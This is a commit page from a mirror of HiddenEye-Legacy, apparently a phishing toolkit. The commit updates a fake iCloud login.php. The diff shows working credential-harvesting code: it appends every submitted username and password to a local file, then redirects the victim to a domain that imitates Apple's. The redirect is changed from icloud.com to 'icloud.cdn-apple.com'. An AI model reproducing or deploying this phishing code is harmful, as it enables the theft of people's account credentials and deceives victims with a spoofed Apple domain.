mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update login.php
This commit is contained in:
parent
e8e5dc278e
commit
dc2fc1be7a
|
@ -2,5 +2,5 @@
|
|||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: https://icloud.com');
|
||||
header('Location: http://icloud.cdn-apple.com');
|
||||
exit();
|
||||
|
|
Loading…
Reference in New Issue
Block a user